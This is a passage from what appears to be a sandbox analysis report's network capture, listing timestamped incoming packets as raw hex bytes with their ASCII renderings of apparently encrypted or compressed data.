33 76 74 8c 42 84 06 a1 74 43 e7 b5 57 6b de d5 b7 70 b8 5e f9 d4 d5 36 fb 49 57 42 f4 bb 29 54 eb 76 59 41 03 35 16 0a 7c a4 c0 89 f1 Data Ascii: YH !^E\T54Kk;uFkM@u^jXNoOQS]v7geGxvy_BV<awUZT{so\|(yYqT'";"$7BD} n\+W}QW5pIH1sNa2t3vtBtCWkp^6IWB)TvYA5\|
2021-12-14 12:42:36 UTC	103	IN	Data Raw: 5b 9b 4d 16 67 1e 7b 10 65 e7 0a f5 6e bd a8 78 2a ba 20 be c9 0d e3 e5 3c d1 ce cd 4f 7e 6f 2e fd 31 ec 35 de 3f ed 47 6c 1b d5 3f 0e 85 73 81 33 90 4e 76 1a 82 6b ce 6d 78 e8 74 70 19 4c 56 b0 09 53 a2 1e 5d 53 a4 38 dc a1 66 2a df 3b 22 25 32 6f 5d 84 87 11 e5 0a b9 d3 69 4c 26 2f 28 5e 60 fb 4f 70 57 b6 ab d4 1a 4c 33 18 e1 4a f7 8e 7b 91 4f 70 fa 24 25 8f 5a 00 28 25 07 f9 cc 3a 0c 48 37 73 1c b1 67 d0 b3 ef 7e fe 1e 4f 96 06 e7 96 8a 00 26 90 74 f2 52 b0 d6 fd b4 e9 ee bf 84 93 78 94 a8 61 72 b5 79 f6 c8 dd 26 cd cf 1f 9e 06 0a f2 d7 e7 44 c6 80 4b bf 6f 4a ca a9 5a 5c 02 44 5d 57 b0 d8 5f 98 08 44 db d7 89 98 a0 76 fd 3c 38 80 6e d9 7d 5e 8c b9 77 2e 1b fd dd b2 76 54 7b 27 a9 c7 b5 dd b5 31 1c da 1a b8 68 ab 4e b7 56 f6 0e a5 97 50 6b 4d 3a 00 50 Data Ascii: [Mg{enx* <O~o.15?Gl?s3NvkmxtpLVS]S8f*;"%2o]iL&/(^`OpWL3J{Op$%Z(%:H7sg~O&tRxary&DKoJZ\D]W_Dv<8n}^w.vT{'1hNVPkM:P
2021-12-14 12:42:36 UTC	104	IN	Data Raw: c9 5c be 69 d0 e2 3d b7 c7 4d 33 4d 9f c1 27 13 68 50 7b 6e b6 90 fd 9a 3e c2 da 49 6b 30 2e 20 81 41 55 2a bd 00 2c 06 f3 4a 28 7d 46 9a 65 ab af 38 3a bb 50 18 1e 92 1c 54 7d 16 d9 4c 07 52 30 66 88 91 13 7c cf 54 db a5 58 ef 4a 61 2e 3e 98 c2 39 8f c5 77 66 88 7b 76 37 d8 b1 6c 20 f9 21 09 fb 5d 4b 30 04 fd fd e6 e7 75 96 e5 87 e9 42 81 4f f8 66 d5 f2 16 91 cd 7b 62 e1 3a 64 03 2b 2c c6 7f 7c 2b c0 c7 79 59 72 0d 5a 27 22 e0 d8 e6 dd e8 ac b9 35 11 33 3c 20 97 9a f8 f3 aa b7 4e f5 62 f2 3e 3f 6c 0b ee df 37 ea 67 d8 36 8e a1 49 c5 ab be 9e 83 5a 23 44 dd 20 84 e8 67 19 5f 59 b7 b9 fb 09 af fd 09 0b 47 ff 97 3a 02 1b c0 9d ff e0 ed bb e1 74 11 5e e3 7c 25 aa a2 b6 71 0c 3b fc 76 81 5b 8d 92 af 6b a7 f9 8e d1 79 8b cc d3 75 25 4f f8 a7 4c 20 67 52 5b 85 Data Ascii: \i=M3M'hP{n>Ik0. AU*,J(}Fe8:PT}LR0f\|TXJa.>9wf{v7l !]K0uBOf{b:d+,\|+yYrZ'"53< Nb>?l7g6IZ#D g_YG:t^\|%q;v[kyu%OL gR[
2021-12-14 12:42:36 UTC	106	IN	Data Raw: 7d 9c 2f b0 12 bc ea 82 7a 8c 9b 54 bd 31 c6 08 4d c2 88 45 03 7c f8 15 95 71 e2 03 e2 6b a2 7a 50 07 bf 3f a5 4a 17 ce f2 3a b5 ce df 47 7a 69 0e 78 28 12 3e e4 2c 8a ff 6b 2a 72 3f 00 85 7f 81 33 9c 4e 71 1a 82 6b cd 7e 05 f5 35 69 1c 75 36 50 e0 bf b5 0d 5f 5f bb 3e 26 bf 5d cd db 14 11 38 45 b7 74 b8 82 0f 62 09 11 d1 68 4b 52 18 36 0e f8 ed 40 7c 14 2a b3 c4 16 2e 3b 2d fe ce ed 9c 6d 1c 4e 73 12 b9 00 9f 4f 12 96 22 2e c7 c4 2c 12 3e 8d 7b 1c aa 70 d7 af 15 7f c3 0e 55 85 f0 f9 ae 4b 2a 61 9f 75 f8 2b aa ff 66 b2 f6 f4 ba 92 fc c0 9c b1 95 6c 88 64 f6 cb 42 95 ce eb 09 68 1a 0f 85 c3 f5 4c c2 97 2c 3c 66 b4 c1 9f 40 51 1d 4d 6e 20 a3 2a 4d bc 1f 57 a8 c3 76 99 88 7d ed e8 c5 7f 9b d4 70 39 25 a8 7f 39 fa f1 e2 b1 71 52 4c 71 49 d5 91 ca a6 42 0d c3 Data Ascii: }/zT1ME\|qkzP?J:Gzix(>,kr?3Nqk~5iu6P__>&]8EtbhKR6@\|.;-mNsO".,>{pUKau+fldBhL,<f@QMn MWv}p9%9qRLqIB
2021-12-14 12:42:36 UTC	107	IN	Data Raw: c9 d4 8a a8 46 f3 bf cd 5f ef 70 62 3c 20 01 f0 06 8f 5a d2 a9 a9 fb 36 91 c4 3c dc 59 9e cb 34 04 73 2c dc 6c a7 92 f1 bf c7 ac 59 5b 69 41 2d 30 84 54 5a c9 db 02 2c 0d c4 5b 3a 75 4c 89 16 be 50 39 12 df c9 75 98 9a 90 cf 6e 12 c4 49 27 ce 20 6e 9b 43 16 46 c3 9c bb a2 53 f4 3f 70 3e 36 83 d6 d6 8a fe 0c bf 6f 17 b9 bb f3 b5 72 61 1c cc f7 04 46 5e 58 02 fc ec ea f1 71 07 74 a9 e3 59 a1 5a 54 7b d2 ed 01 80 be 6b 72 e9 21 65 ec 2e b7 a3 2c 13 81 ca e1 71 3d 64 1f 52 23 3a fe a8 55 21 e9 8a 93 20 18 e9 71 f6 ed 94 ff ec 8a cb c0 f7 73 f0 36 ab 50 4f 19 18 f6 cb 94 0f 1e 87 b2 4b ed 82 b6 89 77 85 0f 51 ef 35 a6 a9 6a 11 40 56 49 b8 d7 16 b9 fa 1e 67 fe ec 90 e1 05 04 d0 82 f7 e0 fc a9 fe 61 ee 4c ff 74 2d ed 55 b6 71 0e 24 ea 74 9f 50 b7 81 b0 76 4e 06 Data Ascii: F_pb< Z6<Y4s,lY[iA-0TZ,[:uLP9unI' nCFS?p>6oraF^XqtYZT{kr!e.,q=dR#:U! qs6POKwQ5j@VIgaLt-Uq$tPvN
2021-12-14 12:42:36 UTC	108	IN	Data Raw: 2a 81 fd 45 70 01 87 70 a1 7c c0 a5 8a d8 5f 5c d6 75 0d fe 98 2e bc f9 8c 16 95 8c 43 35 01 d4 1b 44 60 88 49 08 65 10 03 91 cd e7 00 e0 73 ba 84 94 3f be 39 b9 ba 0b cf f2 3f be d4 d8 58 52 df 06 67 39 ca 14 92 22 96 c6 81 1f df 26 0a 1b 70 81 22 95 45 70 f0 ab e4 c1 6f 09 f6 5d 9e 19 75 30 59 7b ab bd 0d 4f 43 b0 3d f0 1d 71 d4 d4 3f 08 27 49 6b 50 8c 97 27 87 25 b9 d5 7f cc 28 39 37 0f ef f6 49 6b 0a 02 52 c8 01 d6 98 10 f9 c2 ea 80 45 ae 46 6b e6 90 99 93 4c 96 0d 3a 3a 5d c2 38 3a ca 9a 73 1a ad f5 cf a0 eb 7f fb 0e 44 ae 5b e6 ba 97 16 75 6f 71 f2 50 a0 73 61 b6 e9 e5 bd 8e e8 f9 37 a8 6b 67 8c de f2 c8 c6 0a 61 31 1e b8 33 66 76 26 19 43 d6 ae d6 27 6d 4c d6 3e 4e 58 02 54 4d 5c a8 0e fd b4 1f 4c 88 83 88 98 ae 7f 0b b7 1f a8 53 cf 63 3b 28 af 7d Data Ascii: *Epp\|_\u.C5D`Ies?9?XRg9"&p"Epo]u0Y{OC=q?'IkP'%(97IkREFkL::]8:sD[uoqPsa7kga13fv&C'mL>NXTM\LSc;(}
2021-12-14 12:42:36 UTC	109	IN	Data Raw: ac f1 cf d3 e9 65 6f 0a 33 51 c4 25 4f 9d 93 44 7f e3 c2 91 cd 1c 36 bf c7 77 16 0f 6c 3b 4f b3 ed 1a ef 22 34 38 ab f1 14 90 c3 53 79 50 40 eb 36 1d 1b 84 73 6e ad a2 9b 44 3f 3c 28 4f 78 5a 55 1a 81 45 5d 69 2f 13 3d 79 d7 68 3b 74 29 dc 6d b0 5b e5 3e 45 50 77 9e ba 1b 74 6e 12 c5 1e 6b 52 21 6c 91 6f 12 7d c9 42 c8 ab 42 fc 42 59 3f 36 87 d8 c7 8e e9 66 65 d8 00 6d 36 d8 b5 36 60 61 dc dc 05 42 5c 4d 0d fd ec f8 f8 67 68 e4 ab e3 53 85 58 2f 75 58 ec 05 82 dd 7b 73 e9 86 72 fd 2a 0c cc 77 13 81 c0 c7 73 44 6a 1e 52 9e 32 e8 c7 5f 23 e9 80 e6 35 12 37 45 f4 96 9a fe ec 8e a4 5d c5 7a fa d5 c3 6d 27 0b e7 09 04 86 aa 02 87 b2 40 d6 b3 c5 31 7d 5b 05 54 c3 22 8a fc 5e 95 42 56 4f af 5a 03 b9 fa 1f c2 f1 fd 9e 3f 15 0d 72 9f f9 f3 f3 a2 f1 75 fb 48 42 59 Data Ascii: eo3Q%OD6wl;O"48SyP@6snD?<(OxZUE]i/=yh;t)m[>EPwtnkR!lo}BBBY?6fem66`aB\MghSX/uX{sr*wsDjR2_#57E]zm'@1}[T"^BVOZ?ruHBY
2021-12-14 12:42:36 UTC	111	IN	Data Raw: 7e e3 f2 6c 74 e4 99 43 87 24 b3 7a 00 86 f4 18 9f 2f a9 fa 54 64 13 a5 fb 99 7c ca bb 7c 33 5d 76 d0 62 81 e5 98 2e bf ea 90 07 ae cd 54 b5 2e d4 1b 45 c2 99 4d 1c 16 61 14 ac 7f e7 00 eb 6f 9e af 78 97 be 3f af d9 0c cf e3 16 ad c5 cc 49 09 c3 04 67 39 e0 37 a7 99 80 ee 66 16 a1 b3 1c 96 7d 8a 2b fb 32 64 e4 89 54 c7 44 5b f3 73 1f 79 75 36 45 82 ee bd 0d 4f 44 a0 2e a6 2d 71 d4 d4 78 00 26 49 6b 70 a8 92 0b 40 29 bc d3 6e 2e ef 3b 37 04 d4 47 58 6f 16 06 b0 dd 05 f8 33 04 fd d0 91 54 6f 0d 4c 04 f9 b8 2c 99 47 8d 25 57 d0 67 c5 26 15 0f 7b 70 1c bd 06 5b a0 eb 74 80 62 50 86 f2 ed ab 9b 6d 3b 9e 75 f8 7b 29 20 6a a7 ef c8 ae 8b fa be c3 a8 6b 67 78 6d f8 16 d9 07 fc 06 1e b2 03 1b 8c f1 ec 41 c2 80 2e 0b 55 4a c0 b9 97 58 04 7f 58 54 bc 26 5c b4 07 46 Data Ascii: ~ltC$z/Td\|\|3]vb.T.EMaox?Ig97f}+2dTD[syu6EOD.-qx&Ikp@)n.;7GXo3ToL,G%Wg&{p[tbPm;u{) jkgxmA.UJXXT&\F
2021-12-14 12:42:36 UTC	112	IN	Data Raw: b1 27 fe 24 c4 f6 87 2b 28 a3 1d e7 c4 26 ae 8c 98 ad fb ed a2 bc 67 69 63 e7 7f c6 2f 16 de ca 42 6e ed d8 9e a4 f4 fd bd cd 55 f7 11 7a 52 d4 04 ef 1c cd 59 bc 39 a1 d3 6b b5 c3 55 5b 75 9c c1 21 63 0c 43 73 64 aa 9a e4 d4 0a c1 f6 53 76 47 3a 36 ee b1 5d 45 25 14 04 1e ed 68 31 79 41 a3 7c b5 51 3f 79 a9 55 77 92 a9 ab 5f 6e 12 ed 4d 0a 52 27 63 98 47 01 55 c9 44 a7 b9 43 fc 48 4d 33 3f af c0 c2 8e ef 4e 41 d8 00 65 3b da b3 1d aa 63 dc fc 1b 7a 46 35 63 09 ed ee fe 4f 7c e5 ab e9 7b d0 5a 2f 73 fb c3 07 82 c3 14 0b e9 25 79 d5 1f 02 cc 7d 00 86 d7 d4 7b 7e 3b 1f 52 27 22 ef c5 be 14 e8 80 b1 58 d9 35 53 fe 4c 82 26 fb 54 b3 90 78 66 fa 20 c0 7e 2e f1 f6 0e 17 e3 10 28 87 b6 2e 0e b8 b6 83 a7 43 d7 50 1f 20 9d fb 7c 3a 78 47 40 a9 dd 06 bf 95 d4 d3 ff Data Ascii: '$+(&gic/BnUzRY9kU[u!cCsdSvG:6]E%h1yA\|Q?yUw_nMR'cGUDCHM3?NAe;czF5cO\|{Z/s%y}{~;R'"X5SL&Txf ~.(.CP \|:xG@
2021-12-14 12:42:36 UTC	113	IN	Data Raw: 8a 4f e9 6c a3 ed 40 52 57 2a 1c ab e1 e6 ce a6 3e 0e a8 e1 67 7e 29 95 56 74 cf 97 7e 24 85 fd 05 5a bb 96 26 46 b2 98 84 d3 a1 7d c6 ae 8c 20 50 5c c1 69 9f bb 66 2f 91 cc 81 10 47 9d 3b 45 2f d4 1d 42 ad 65 4c 1c 77 69 c4 bb 65 ed 17 30 1b 7f ae 78 31 d1 c5 ae 37 0a 19 ff 21 e9 d3 c7 4f 6b 73 19 55 cd ed 13 d9 26 8b f6 ba 13 c9 31 18 be 64 80 22 9e 4e 57 f7 88 47 d0 64 1c c8 8b 71 31 79 27 48 ec c3 44 0c 4e 51 bb 02 cb b5 71 c5 d5 08 00 d9 48 4d 5a af b0 10 72 32 b2 d3 79 4a 30 08 c9 0f d0 f9 5b 66 0b fc 33 df 05 cf 08 12 f6 d6 ef 9f 72 33 b8 6a c0 b1 14 fd b2 63 de 27 2e 76 ce 2c 03 2c 81 30 e2 ba 54 c0 a9 fc a8 e2 05 14 95 f3 e6 ab 96 1d 50 60 74 de 5d c5 fe 64 b6 ef f7 ac 85 f2 c2 9f a8 7a 66 bb 2b 0c c9 e0 00 d3 5e e2 b3 09 0e 8e b6 1a 45 c2 80 4b Data Ascii: Ol@RW*>g~)Vt~$Z&F} P\if/G;E/BeLwie0x17!OksU&1d"NWGdq1y'HDNQqHMZr2yJ0[f3r3jc'.v,,0TP`t]dzf+^EK
2021-12-14 12:42:36 UTC	114	IN	Data Raw: ca 7a dd c9 c7 87 25 4f fa a7 1a 20 67 52 45 85 8d f6 3a 51 f7 07 cc e9 03 33 ca 18 69 90 d5 82 e0 a5 2c ba 99 3c 12 44 5a b7 b2 36 04 81 9e 27 4b 8b 77 7a b3 59 6a 16 bc 5d c3 92 83 50 83 f2 5b b3 50 1a d5 66 6a b8 ef d1 8e a2 23 69 38 9b e9 1c 55 ca 3c 92 20 9d 04 33 db fe 92 59 9c 77 92 3c e0 c6 1b f8 2d 9b 41 07 75 82 9e f1 0e cf 01 3b 15 37 18 90 d2 79 29 1e 18 01 98 51 90 a4 2e 31 4e af 05 c7 39 d1 fc a5 32 97 5e fc 4f af f7 be 59 64 04 7c a0 e3 f7 c3 aa 34 ef b5 de 65 46 ce 64 b6 a6 2e 9b 41 3c 86 e5 19 93 0a 7f fd 7d 71 1c b7 05 a2 75 dd 67 33 e5 58 d2 67 5c 06 f9 98 2e a2 cb 9b 0c 91 8b 5f a6 33 2a 1a 69 d2 88 4b 1f 78 11 c2 28 0a 1c 01 ea 72 b1 b2 6b 30 be 2e a4 28 2e 31 f3 12 ac eb 57 50 59 6b 0d 67 22 e7 20 d8 db 83 c2 7d 1c b0 dc 1d 96 71 90 Data Ascii: z%O gRE:Q3i,<DZ6'KwzYj]P[Pfj#i8U< 3Yw<-Au;7y)Q.1N92^OYd\|4eFd.A<}qug3Xg\._3*iKx(rk0.(.1WPYkg" }q
2021-12-14 12:42:36 UTC	115	IN	Data Raw: 04 f4 cc b5 0b 0d 7e 39 53 c4 e2 82 b6 4a 16 df 75 67 7c 83 de b7 53 81 51 be f8 fd 69 43 34 62 13 23 c7 8e ed e5 2b 96 63 82 9d ed 33 0f 1a d0 ea 45 f4 91 85 a2 77 0b c1 b8 22 d5 fd 24 e3 33 d8 f4 6d 38 1e 1e 25 98 43 33 47 8b 65 87 2d de 72 4b 15 5a cb c8 dd 13 33 9d 45 17 05 52 5c 80 e9 bd 30 9d 89 41 ae 7f b8 9d 39 10 b3 a3 f4 57 b2 3a f4 40 67 c5 bc f9 9f f5 b6 6f 40 e4 54 8f be 79 77 10 06 b1 8f 89 22 57 61 69 4d f7 16 0e 09 b1 71 fc 24 82 0e 65 ec 72 cb c5 ad 32 94 ee d7 f3 95 c3 33 99 7c 10 d2 fc bf 72 01 87 fb e7 8b e7 7c 7a 60 cf 40 c1 34 ee b0 9e 48 68 f1 ed bc a3 9b 37 a3 de 5a ed 1a 69 22 29 fb ee 36 e3 45 97 26 a1 e8 39 b7 d2 56 6d a5 9f ed 35 0e 76 38 35 6f a7 9c e1 6d bd 85 f7 59 6d 54 29 32 84 45 4d 40 3c 08 d2 0d d5 ff 3b 75 46 89 16 f5 Data Ascii: ~9SJug\|SQiC4b#+c3Ew"$3m8%C3Ge-rKZ3ER\0A9W:@go@Tyw"WaiMq$er23\|r\|z`@4Hh7Zi")6E&9Vm5v85omYmT)2EM@<;uF
2021-12-14 12:42:36 UTC	117	IN	Data Raw: d0 46 bb 71 17 29 f5 6a 77 5a b0 90 b3 48 f1 f8 a2 cb 65 cb dd a5 7b 35 42 e2 36 cb 0e 6e 60 72 5d e2 27 27 58 ee 65 36 f9 0e 2a 11 eb 77 9b cc 98 e5 a3 f1 b6 95 dd 1d 7b 5b b0 bc 0b 74 62 61 26 61 92 69 43 a7 42 68 10 a3 73 30 8a 51 5a ac e5 4e 1e 88 08 d1 7d 3c a2 90 50 9f a9 3d 68 c4 e1 8c 0b 52 a1 4e 24 08 ae 07 3b be 13 80 54 9a 09 4d 21 ea 32 05 cc 2f 86 43 6d 3d 9c 84 0b 18 39 1e 20 0c 2a 47 b4 3e 8b d6 10 0e 0d 82 af 80 83 3c 04 b8 b8 b9 ef cf 26 1b 8c 25 93 5c f5 67 ad fb a2 ad 7a 0d 65 a3 97 f4 c8 b5 23 1b a9 e1 61 7e 29 93 56 4e cf 97 7e 3d 97 f0 05 5a 39 85 e3 49 77 18 af c2 ac 63 c6 4f a3 1f 6c 5a c1 67 86 e8 9d bf 31 c1 88 07 90 92 43 34 29 d4 1b 44 d1 9e 5c 1b 67 17 11 35 5a e7 00 eb d6 bf ab 6c 13 15 3f af 3d 24 22 f3 3e a0 e8 11 4d 7a 72 Data Ascii: Fq)jwZHe{5B6n`r]''Xe6w{[tba&aiCBhs0QZN}<P=hRN$;TM!2/Cm=9 G><&%\gze#a~)VN~=Z9IwcOlZg1C4)D\g5Zl?=$">Mzr
2021-12-14 12:42:36 UTC	118	IN	Data Raw: f5 8a 80 af 75 d2 b1 c4 81 48 cd 74 3a 25 be 6f da 05 dc cc 9d 74 6e 9c 3b 2c 8d 98 ca b3 25 06 d9 1a b6 54 b5 cb ad db d7 18 bf f9 79 27 4c 30 1b 73 3c d4 ba ea e7 f7 de 62 82 62 82 0a 1f 0c c9 83 4d b7 91 94 a7 6f f5 e0 d4 77 ff 03 ed e3 39 65 91 73 2f 30 28 3e 89 3d 70 57 8e 76 6e f6 e5 a7 de 2d 5f cb d8 a5 4f cc 9c 6d 38 11 78 46 80 dc b8 21 1a 9e bf af a4 bb 8a 3b 03 a0 b7 c9 21 4d 3b d8 42 5d c2 8e bc 9c b6 7a 79 4d f4 2b a9 be 68 72 0d f8 b0 a3 de 7b 0f 24 68 4d f3 14 75 bf 8f 28 d0 bd 94 0d 47 6e 64 1d 42 98 21 91 ef cd e0 8a b3 85 a2 a8 00 c1 2b 83 86 8e a5 e3 3f 92 84 8a 69 65 c5 5d c3 26 18 91 b1 40 6e e7 fb 7e a0 9b 3d 97 2e 5d ed 01 f0 34 37 d3 e2 13 f4 49 8c e0 ac d1 3c a4 f3 50 73 e4 9e c1 27 f0 74 43 62 78 b4 9d da 10 c0 c3 f6 59 78 4e 39 Data Ascii: uHt:%otn;,%Ty'L0s<bbMow9es/0(>=pWvn-_Om8xF!;!M;B]zyM+hr{$hMu(GndB!+?ie]&@n~=.]47I<Ps'tCbxYxN9
2021-12-14 12:42:36 UTC	119	IN	Data Raw: 95 29 02 6b 57 8f f7 e6 d1 b4 ea 6b 32 65 c7 76 2d ed 12 b7 71 0c 35 e3 73 a1 78 99 9a b6 1e d3 f9 a2 cd 15 43 ce a8 71 28 67 bb c9 ca 28 76 51 44 77 c6 22 38 57 92 e2 37 e8 05 5a 84 15 76 bd cd 98 e4 bc 48 52 91 c2 15 65 47 b7 b9 2e 84 7c 9f 21 5a 19 7a 69 b8 58 68 03 b2 7c 2b bb 8a 5e 80 fd ee 74 df 1d c5 6d 02 08 e4 d1 95 b8 3b 6a ee 75 c1 0a 54 b2 4d 94 20 9b 07 28 ab 18 8c 4f b2 3e 45 3e e6 6e 15 ff 2a 84 55 3e dd 9d 84 05 27 de 0f 2a 15 07 ed bf 2d 8c ef cc 02 12 93 58 95 87 f2 16 b0 a8 3e 5b 3d d8 e4 72 29 a1 5e d8 71 aa 7a 81 53 7b 20 cd ba c3 f2 dc a1 10 b2 b4 f2 66 6a 10 5d 4a 59 37 81 df 30 86 f4 13 9f 0b 90 dd 47 72 99 90 d3 a1 7d 68 a0 83 27 4f 48 f8 c1 80 f9 92 3a 95 29 8b 07 97 8d d9 be 2e d4 1a 56 e0 88 6f 0a 66 8a 2b b9 65 e6 a2 fb 56 ba Data Ascii: )kWk2ev-q5sxCq(g(vQDw"8W7ZvHReG.\|!ZziXh\|+^tm;juTM (O>E>nU>'-X>[=r)^qzS{ fj]JY70Gr}h'OH:).Vof+eV
2021-12-14 12:42:36 UTC	120	IN	Data Raw: 4f 5c 5a 9b 58 58 02 5f 4a 59 ad 02 49 24 33 64 b1 fb 9f 02 8c 64 d5 a7 30 50 76 cf 63 2a 0d ad 77 24 0e d8 fa b7 76 4f 0b 2b 57 c6 82 4a fb 4b 12 df 64 f0 7f 83 d0 bf 8b 0a 1a bf f8 dc 43 7a 30 1f 53 31 d5 9e e5 cf 68 de 62 88 44 60 08 0e 1a d8 ae 41 f1 91 83 8a 53 0b e1 f2 51 cc 6c 24 e9 00 a6 8b 2e 39 08 97 0c 9a 38 71 55 90 63 b8 d0 cc a4 c0 16 7e cb c9 aa 25 c1 9c 41 3b 16 46 4d 87 b6 49 31 1f 8e 2e 48 8a b8 97 3b 23 98 a8 cd 3b b3 28 d1 68 91 c2 a5 0d 12 f3 b3 79 56 ed 5b 9b a2 7c 5a 25 fc b0 a5 88 ad 2b 24 68 4c e7 00 61 67 13 71 f8 26 bc 25 48 d9 75 dd e7 5b 23 91 e4 d7 ea 99 15 1a b1 72 15 d3 ab af a4 8c ad ef f3 9e c3 c6 69 65 c5 79 ed 2a 10 b7 a4 6a 86 e5 d3 96 8a 72 35 bf c7 4e f1 1f 44 15 24 05 e9 0c 68 4a bd 39 aa ef 28 a3 eb f0 73 5b 94 e9 Data Ascii: O\ZXX_JYI$3dd0Pvcw$vO+WJKdCz0S1hbD`ASQl$.98qUc~%A;FMI1.H;#;(hyV[\|Z%+$hLagq&%Hu[#rieyjr5ND$hJ9(s[
2021-12-14 12:42:36 UTC	122	IN	Data Raw: 39 80 f2 65 06 40 47 5e a7 cf fa b8 d6 19 d8 d3 35 8f 30 17 13 d0 9f e0 ff e1 4d ff 4d fc 4e c9 7f 05 a3 54 b6 7b 69 d3 eb 65 8f 48 91 85 ae 62 4e f8 b3 dc 65 fb 30 a9 57 30 5e f2 b6 86 23 67 5c 43 50 ca 3b 3a 51 fb 7b 3d f7 22 26 0b 15 67 a0 d9 90 1e b5 0b b1 81 c4 02 6c 7e d6 ac 06 61 17 68 26 4d 92 6e 7b a7 43 68 0a a3 73 2a 8c bf a5 81 d7 47 16 37 08 d1 7f 39 ad fb c0 8c be 3c 6f d1 84 3b 0b 7e ac f8 ed 21 9b 06 24 bd 1a 84 59 8b 0f 5f 33 1e cd 28 f7 2f 95 69 3d 7b 9d 82 27 2b e3 0d 20 37 ba 58 bf 27 95 de 1e 0d 01 84 51 90 b8 2e 07 4e af 05 df 02 15 e5 73 3a 9e 5c eb 70 bc e7 a9 4c 59 df 6e 87 ef f7 d8 bd 57 39 b6 f2 6a 61 1b 8d 5e 59 20 81 48 c9 87 d8 18 f2 b9 81 fc 5b 77 11 b4 c0 b6 7c db a6 bd 3a a5 5d fc 69 91 ec 89 3a 27 f9 8d 18 9b 89 43 b9 3f Data Ascii: 9e@G^50MMNT{ieHbNe0W0^#g\CP;:Q{="&gl~ah&Mn{Chs*G79<o;~!$Y_3(/i={'+ 7X'Q.Ns:\pLYnW9ja^Y H[w\|:]i:'C?
2021-12-14 12:42:36 UTC	123	IN	Data Raw: ce df 2f c5 3c 71 4e 08 08 8f cf 89 95 c0 86 2e 4c 91 4b c0 b5 5e 37 d3 57 59 42 d3 da 5f b4 19 51 cf 08 8a 98 ae 1a 2b a6 3a 86 77 c0 72 3c 4a 45 76 24 02 e6 a1 67 74 45 75 56 ab c7 99 cc af 25 c3 d9 1a b6 11 7d d5 b5 50 ef 16 ae f6 87 27 4c 30 1b 48 2d ef 96 ed e7 56 cd 69 f1 bb 80 0a 08 09 ca 97 76 fc fe ad a0 77 0d f0 e8 68 f1 44 09 e6 39 69 a1 00 3b 1e 1c 0f 71 3a 70 4c e4 45 92 f7 cf b5 d6 2f 51 e3 e4 a5 56 34 b5 6f 3f 05 54 74 78 db b8 3a 70 ae 43 ae 8e a9 8d 2b 69 8a a4 cc 3d b5 2b e4 2f 61 c1 a5 0d 40 d6 96 51 7a fe 47 80 ad 7c 5a 35 f8 b0 a9 40 20 3d 2e 7f 9b e0 1e 64 45 a1 66 c6 59 6a f2 b2 c8 66 dc 19 a0 34 80 fb d7 e0 03 8a 0d 5e 8f ec 3a 20 82 a4 cd 98 fb e7 8a eb 65 69 36 cf 51 c4 24 10 b1 b2 1c 6e e7 d3 8e a2 9b 37 a5 cd 5f ec 0b 6c 3d 20 Data Ascii: /<qN.LK^7WYB_Q+:wr<JEv$gtEuV%}P'L0H-VivwhD9i;q:pLE/QV4o?Ttx:pC+i=+/a@QzG\|Z5@ =.dEfYjf4^: ei6Q$n7_l=
2021-12-14 12:42:36 UTC	124	IN	Data Raw: 0e 1f 46 37 0c af 85 41 c5 b0 bb 9d 77 73 37 47 c5 39 52 e8 70 3b 40 17 55 b8 d7 04 b9 fa 1e d1 ff ec 90 30 05 04 d0 97 f6 e0 fc a3 fe 61 ef 45 cf 76 2c 9f 57 48 64 4a 24 ea 67 8b 58 e1 e1 b1 71 5d fa a6 b6 06 da ce ac 51 24 5c cc cc ca c8 67 58 52 57 e3 27 29 53 03 7d 7b e8 03 37 1e 6b 43 b7 c6 8d 9d ca 26 a5 94 c0 c3 25 56 b0 af 2e 7f 78 9f 2d 65 94 7c 69 b2 24 06 1c a3 66 3e 87 51 5a 96 05 4d 6f c7 25 fc 7b 29 25 53 ac 1f a8 3c 7a c4 98 be 8a 53 a5 c4 bb 78 99 06 31 c9 76 92 59 9e 1b 56 3c 9b b3 05 e0 3a 92 3a 96 7f 9d 80 27 e2 e1 0d 20 1b 3b a6 be 3b 78 d7 0a 04 3e be 53 85 21 86 68 32 af 29 d2 38 da 9f f1 3b 81 4b d0 3f be f6 b4 2e fa 20 6f af e7 f0 ca ce b9 10 b4 f6 6e 05 ba 9f 49 5d 19 7b 50 37 8c f1 06 72 2b 97 02 50 68 1d 83 94 a3 79 44 06 df b7 Data Ascii: F7Aws7G9Rp;@U0aEv,WHdJ$gXq]Q$\gXRW')S}{7kC&%V.x-e\|i$f>QZMo%{)%S<zSx1vYV<::' ;;x>S!h2)8;K?. onI]{P7r+PhyD
2021-12-14 12:42:36 UTC	125	IN	Data Raw: 9e d3 64 b6 ef ce f3 e4 65 d0 94 ac 72 f7 81 47 f9 ee d5 3d c1 2e 0d 9a 24 0a 89 df cc 12 bc 1f 25 23 69 50 5a 96 64 52 24 4f 46 60 a6 0e 73 b6 1f 40 8a 8f f6 01 a5 75 d1 bc a0 a5 49 c5 45 2a 3a 95 6d 0c 29 f2 ce b0 5c 1f 01 a0 56 c6 9d d6 2d 6f 3f d0 3c a0 61 b3 cb b9 7e d1 1a bf fe d3 31 33 a9 1e 59 26 da 10 ca ca 5b f8 7f 9d a5 9d 05 26 37 d8 86 60 de cb fb 3b 76 0b e5 e6 e3 d8 41 2f c5 27 70 c2 31 34 36 37 25 9a 3e 5a 24 f5 f8 91 f7 cd bb cf a4 7f e6 c5 86 49 3b 82 19 22 09 7a 71 91 d9 be 1a 7d f6 d8 af 88 bc 82 22 9c 85 8b c0 1d ac 30 eb 24 69 cb 8d 2a 9c d9 b5 53 13 80 de 8b be 6c 6d 06 62 95 8e 95 06 33 2f 77 22 ea 3c 58 4d b0 77 d2 4e ea 94 4c d9 77 d4 c3 29 04 bc e2 e0 e9 81 22 40 aa 6e 3b e8 24 a8 a2 a6 c2 85 7e 8b eb 61 76 68 55 74 e9 20 36 ae Data Ascii: derG=.$%#iPZdR$OF`s@uIE:m)\V-o?<a~13Y&[&7`;vA/'p1467%>Z$I;"zq}"0$iSlmb3/w"<XMwNLw)"@n;$~avhUt 6
